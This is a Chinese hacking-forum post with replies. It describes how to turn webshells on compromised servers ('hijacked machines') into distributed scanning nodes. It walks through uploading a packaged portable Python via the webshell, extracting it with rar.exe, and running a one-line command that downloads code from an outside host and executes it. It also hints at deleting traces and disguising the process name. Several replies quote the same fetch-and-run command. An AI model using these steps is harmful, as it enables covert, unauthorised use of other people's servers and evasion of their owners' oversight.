webshell的另一用途

2014-02-27 11:10:10 28 5529
话说过个新年,人也懒了,好久没发帖了,上来看看号是不是被封了。。。。

言归正传,不知道大家都用不用www.yascanner.com,旧版是www.bugscan.net。挂载各种插件,不过扫描要添加在线引擎节点。

你也可以自己电脑执行python -c "exec(__import__('urllib').urlopen('http://www.yascanner.com/xxxxxyyyyyzzzzzz').read())" 来上线。

我这里要说的是,各位手里闲着的webshell也不少吧,何不把它们派上场?当然有人要问了,你以为每台肉鸡都有Python了? 哈哈

好吧。这个问题我也困扰了半天,一度以为要来个自安装版或者什么t00ls专版by iframe呢。写了半天autoit了,才想起绿色版。


1.选个Python2.7.*的版本下载到本机执行安装,第一步选择Install just for me (not available on Windows Vista) (该步尤为重要!)

2.把一些帮助文档打钩去掉,能省就省。一顿next> finish。

3.把Python2.7文件夹打包,我这里选用winrar,因为体积很大,分卷压缩。
rar a -m0 -v2m d:\py.rar c:\python2.7\*
4.选一个可写的角落,上传所有压缩包和winrar目录下的386K的rar.exe。

5.
C:\temp\rar.exe x C:\temp\py.part01.rar c:\temp\
OK解压完了 开工。。。

等等,什么删除文件,更换一个有诱惑力的进程名,我这里就不多说了,当然肉鸡有python就更完美了。

webshell下让肉鸡执行
c:\temp\python.exe -c "exec(__import__('urllib').urlopen('http://www.yascanner.com/xxxxxyyyyyzzzzzz').read())"
IIS APPPOOL进程该起什么进程名,大家自己琢磨吧。


开扫


进程所属名问题,欢迎大家建议



听说上一篇文章作者抓鸡分分钟破百,不在话下,啧啧,这上线,这速度。

本文技术无任何含量,请勿拍砖。

关于作者

iframe23篇文章940篇回复

The only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards.

评论28次

要评论?请先  登录  或  注册
  • 8楼
    2014-2-27 15:46
    PSoul

    楼主,我是个小菜,正在学xiPYTHON,请问你那句python -c "exec(__import__('urllib').urlopen('http://www.yascanner.com/xxxxxyyyyyzzzzzz').read())"是啥意思,还有这个网站能介绍下吗,不是很了解

    1

    bugscan 一个简洁实用的在线Web安全扫描、漏洞共享的平台! yascanner是它的新版。 就是用Python执行url分发过来的任务。 上线的机器越多,执行速度越快 ,和分布式彩虹表破解道理差不多。

  • 7楼
    2014-2-27 14:52

    收藏了,不过这网站我打不开。。要上VPN才可以,难道被墙?

  • 6楼
    2014-2-27 14:47
    PSoul

    楼主,我是个小菜,正在学xiPYTHON,请问你那句python -c "exec(__import__('urllib').urlopen('http://www.yascanner.com/xxxxxyyyyyzzzzzz').read())"是啥意思,还有这个网站能介绍下吗,不是很了解

    1

    Remote File Inclusion(RFI)

  • 5楼
    2014-2-27 14:39

    很好的思路

  • 4楼
    2014-2-27 14:09

    怎么看回显结果?

  • 3楼
    2014-2-27 13:54

    楼主,我是个小菜,正在学xiPYTHON,请问你那句

    python -c "exec(__import__('urllib').urlopen('http://www.yascanner.com/xxxxxyyyyyzzzzzz').read())"
    是啥意思,还有这个网站能介绍下吗,不是很了解

  • 2楼
    2014-2-27 13:08

    用koding不就好了- -

  • 1楼
    2014-2-27 11:40

    这类扫描器 都存在代理验证的问题 楼主还可以用webshell 进行网站所有者的验证